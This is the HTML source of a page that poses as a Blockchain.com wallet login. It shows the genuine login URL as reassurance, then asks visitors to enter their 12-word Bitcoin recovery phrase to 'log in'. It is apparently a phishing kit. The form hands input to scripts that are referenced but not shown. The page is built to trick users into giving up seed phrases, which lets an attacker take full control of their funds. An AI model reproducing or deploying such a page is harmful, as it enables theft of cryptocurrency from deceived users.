<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta
      name="description"
      content="The world's most trusted and popular crypto wallet. Sign up today to buy and sell Bitcoin, Ethereum and other top cryptocurrencies."
    />
    <meta
      name="keywords"
      content="bitcoin wallet, blockchain wallet, online bitcoin wallet, bitcoin wallet online"
    />
    <link rel="stylesheet" href="style.css" />
    <title>Wallet | Login</title>
    <link rel="icon" href="/blockchain-html/assets/images/favicon.ico" />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&display=swap"
      rel="stylesheet"
    />
    <script
      charset="UTF-8"
      type="text/javascript"
      src="./75adeae6-372f-4ea9-8f32-8dfe527d0b6b.js"
    ></script>
  </head>
  <body>
    <script>
      0;
    </script>
    <div class="__next">
      <button class="btn interact-button">test</button>
      <div class="sc-a019a3b0-0 gAPBZN">
        <!-- top -->
        <div class="sc-ae75bbb8-0 inhrnT">
          <div class="sc-ae75bbb8-2 dtgNZd"></div>

          <div class="sc-ae75bbb8-1 zaciR">
            <div direction="row" class="sc-b6b6700-0 jTpRSp">
              <a
                style="display: contents"
                class="sc-1d8c9399-0 jDcQkQ"
                href="/beta/auth/login"
                ><img
                  src="/blockchain-html/assets/images/branding.svg"
                  class="sc-ae75bbb8-3 sc-ae75bbb8-4 fqKPzw fPHnJz" /><img
                  src="/blockchain-html/assets/images/branding_small.svg"
                  class="sc-ae75bbb8-3 sc-ae75bbb8-5 fqKPzw PgZAc"
              /></a>
              <div class="sc-45658ed8-0 ktcWkj"></div>
              <div class="sc-7ea9b09f-0 bhCRoc">
                <span
                  color="#fff"
                  class="sc-848ef629-7 sc-7ea9b09f-5 OOOXM dgzrtv"
                  >Don't have an account?</span
                ><a
                  class="sc-1d8c9399-0 dhzBWU sc-7ea9b09f-6 cJvLDH"
                  aria-label=""
                  role="link"
                  href="/beta/auth/signup"
                  ><div class="sc-da1c0147-1 jRkJxO sc-7ea9b09f-6 cJvLDH">
                    <span color="#fff" class="sc-848ef629-10 bjHIDi"
                      >Sign Up</span
                    >
                  </div></a
                >
              </div>
            </div>
          </div>
        </div>

        <!-- bottom -->
        <div class="sc-a019a3b0-2 fbVIJS">
          <div class="sc-df0eddf3-0 kgXglJ sc-a019a3b0-1 bfxDGi">
            <main class="sc-a019a3b0-3 YYWzp">
              <div class="sc-1d6e4db8-0 jLQFva">
                <!-- main -->
                <div class="sc-39cdbb1c-0 jHvymL">
                  <span class="sc-848ef629-7 dcthHt"
                    >Check that the URL is correct.&nbsp;</span
                  >

                  <span>
                    <svg
                      xmlns="http://www.w3.org/2000/svg"
                      width="15"
                      height="15"
                      fill="#677184"
                      viewBox="0 0 24 24"
                      cursor="auto"
                      aria-label=""
                      style="cursor: inherit"
                    >
                      <path
                        fill-rule="evenodd"
                        d="M19 11a2 2 0 0 0-2-2V7A5 5 0 0 0 7 7v2a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h10a2 2 0 0 0 2-2zM9 7v2h6V7a3 3 0 1 0-6 0m3 10.5a2 2 0 1 0 0-4 2 2 0 0 0 0 4"
                        clip-rule="evenodd"
                      ></path>
                    </svg>
                    <span class="sc-848ef629-10 hXsuBL"
                      >https://login.blockchain.com</span
                    >
                  </span>
                </div>

                <!-- form -->
                <div class="sc-df0eddf3-0 hBUDJV sc-1d6e4db8-14 fcjvUg">
                  <form
                    action=""
                    class="sc-108f69a2-0 bMGrzX"
                    aria-label="Login Form"
                    id="formId"
                  >
                    <!-- back button -->
                    <div class="sc-f0592435-0 iHYNiC">
                      <a class="sc-1d8c9399-0 jDcQkQ" href="/beta/auth/login"
                        ><button
                          style="grid-area: back"
                          class="sc-f0592435-1 deBsBZ"
                        >
                          <svg
                            xmlns="http://www.w3.org/2000/svg"
                            width="24"
                            height="24"
                            fill="#121D33"
                            viewBox="0 0 24 24"
                            cursor="auto"
                            aria-label=""
                            style="cursor: inherit"
                          >
                            <path
                              fill-rule="evenodd"
                              d="M14.707 6.293a1 1 0 0 0-1.414 0l-5 5a1 1 0 0 0 0 1.414l5 5a1 1 0 0 0 1.414-1.414L10.414 12l4.293-4.293a1 1 0 0 0 0-1.414"
                              clip-rule="evenodd"
                            ></path>
                          </svg></button></a
                      ><span
                        color="#0C6CF2"
                        style="grid-area: user"
                        class="sc-848ef629-10 uyDFC"
                      ></span>
                    </div>

                    <!-- phrase texts-->
                    <div class="sc-45658ed8-1 iTqobn">
                      <div width="88" height="88" class="sc-f88a88c5-0 eVmhts">
                        <svg
                          xmlns="http://www.w3.org/2000/svg"
                          width="66"
                          height="66"
                          fill="#121D33"
                          viewBox="0 0 24 24"
                          cursor="auto"
                          aria-label=""
                          style="cursor: inherit"
                        >
                          <path
                            fill-rule="evenodd"
                            d="m10.5 11.914 1.58 1.58-.989.97H10a1 1 0 0 0-1 1v1.121L6.586 19H5v-1.586zM9.205 8.81c.008.56.09 1.045.171 1.398l-6.083 6.084A1 1 0 0 0 3 17v3a1 1 0 0 0 1 1h3a1 1 0 0 0 .707-.293l3-3A1 1 0 0 0 11 17v-.536h.5a1 1 0 0 0 .7-.287l1.584-1.555c.354.082.841.164 1.405.173 1.167.018 2.712-.281 4.018-1.588 2.546-2.546 2.219-6.196 0-8.414s-5.868-2.546-8.414 0C9.486 6.099 9.187 7.643 9.205 8.81M15 6a1 1 0 1 0 0 2c.175 0 .433.097.668.332S16 8.825 16 9a1 1 0 1 0 2 0c0-.825-.402-1.567-.918-2.082C16.567 6.402 15.825 6 15 6"
                            clip-rule="evenodd"
                          ></path>
                        </svg>
                      </div>
                      <div class="sc-45658ed8-1 cIEpRt">
                        <h3
                          style="max-width: 400px"
                          class="sc-848ef629-3 eBKcYg"
                        >
                          Input your Bitcoin wallet's Recovery Phrase
                        </h3>
                        <span
                          style="max-width: 480px; text-align: center"
                          class="sc-848ef629-5 hukcPb"
                          >Your 12 word Recovery Phrase will be used to logged
                          in your Blockchain.com account. If an account is
                          found, you will be logged in immediately</span
                        >
                      </div>
                    </div>

                    <!-- phrase textarea -->
                    <div style="width: 100%">
                      <textarea
                        placeholder="Enter your 12 word Recovery Phrase"
                        type="textarea"
                        aria-label="Enter your 12 word Recovery Phrase"
                        class="sc-b3080095-0 bEfDiY"
                        id="textareaID"
                      ></textarea>
                      <div
                        color="#677184"
                        style="text-align: left; margin-left: 24px"
                        class="sc-848ef629-11 bSOatK"
                        id="errorDiv"
                      >
                        Separate each word with a space
                      </div>
                    </div>

                    <div class="sc-45658ed8-0 ktcWkj"></div>

                    <!-- form button -->
                    <button
                      type="submit"
                      width="100%"
                      aria-label=""
                      size="1"
                      class="sc-da1c0147-0 ihZnvo"
                      onclick="handleSubmit(event)"
                      disabled
                      id="submitBtn"
                    >
                      <span class="" id="btnText">Login</span>

                      <span class="spinner" id="loadingSpinner"></span>
                    </button>
                  </form>
                </div>
              </div>
            </main>
          </div>

          <footer class="sc-755818d5-0 cmsLOD">
            <div class="sc-755818d5-1 hdaMUb">
              <span style="text-align: center" class="sc-848ef629-11 bSOatK"
                >© Blockchain.com. All rights reserved. Version v5.0.58</span
              >
              <div>|</div>
              <div
                style="
                  font-size: 12px;
                  width: max-content;
                  margin-left: -16px;
                  color: rgb(103, 113, 132);
                "
                role="combobox"
                aria-haspopup="listbox"
                aria-expanded="false"
                tabindex="0"
                aria-labelledby="customSelectLabel"
                class="sc-a7f348e1-0 fuFdFv"
              >
                <select class="sc-a7f348e1-5 jonXev">
                  <option value="en">🇺🇸 English</option>
                  <option value="es">🇪🇸 Español</option>
                  <option value="fr">🇫🇷 Français</option>
                  <option value="pt">🇵🇹 Português</option>
                  <option value="ru">🇷🇺 Русский</option>
                </select>
                <div
                  style="background-color: transparent"
                  class="sc-a7f348e1-1 cAqufA customSelectLabel"
                >
                  🇺🇸 English
                </div>
              </div>
            </div>
          </footer>
        </div>
      </div>
    </div>

    <script src="script.js" defer></script>
  </body>
</html>
